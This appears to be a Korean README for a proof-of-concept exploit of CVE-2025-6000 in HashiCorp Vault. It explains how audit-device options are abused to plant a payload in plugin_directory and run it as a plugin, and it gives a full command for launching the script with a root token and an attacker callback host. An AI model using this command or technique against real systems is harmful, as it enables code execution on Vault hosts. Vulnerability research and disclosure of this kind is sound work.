
CVE-2025-6000에 대한 개념 증명 익스플로잇으로, HashiCorp Vault 감사 백엔드에서 권한 상승을 통해 RCE를 달성하여 루트 토큰으로 임의 코드 실행을 가능하게 합니다.
CVE-2025-6000에 대한 개념 증명(PoC)으로, HashiCorp Vault의 감사(audit) 백엔드에서 발생하는 권한 상승-to-RCE 취약점입니다. 감사 디바이스는 권한 있는 호출자가 prefix, file_path, mode 옵션을 검증 없이 제어할 수 있게 합니다. 실행 가능한 페이로드를 Vault의 plugin_directory에 작성한 다음 이를 플러그인으로 등록하고 마운트함으로써, 루트 토큰을 가진 공격자는 Vault 호스트에서 임의 코드를 실행할 수 있습니다.
https://github.com/user-attachments/assets/f8d6c90a-b511-4e96-8e4d-718c7a765601
plugin_directory가 구성된 Vault 0.8.0부터 1.20.0까지.sys/audit, sys/plugins, sys/mounts) 필요.python3 CVE-2025-6000.py <vault-host> <vault-port> --token <root-token> \
--socket-addr <ip:port Vault dials> \
--listen-port 9861 \
--callback-host <your-ip> --callback-port 8000 \
--cleanup
--socket-addr — Vault가 감사 스트림을 위해 연결하는 주소 (VPN IP:포트 또는 ngrok TCP 엔드포인트).--listen-port — 캡처 서버가 바인딩하는 로컬 포트.--callback-host / --callback-port — 실행 확인에 사용되는 HTTP 엔드포인트.--cleanup — 종료 시 감사 디바이스, 플러그인, 마운트를 제거합니다.캡처가 실패하면 스크립트는 수동 SHA256 프롬프트로 대체됩니다. 모든 옵션은 -h를 실행하세요.
승인된 보안 테스트, 연구 및 교육 목적으로만 사용하세요. 소유한 시스템 또는 명시적인 서면 허가를 받은 시스템에만 사용하십시오. 이 소프트웨어 사용에 대한 책임은 전적으로 사용자에게 있으며, 작성자는 오용이나 손해에 대해 어떠한 책임도 지지 않습니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다.
MIT — LICENSE 참조.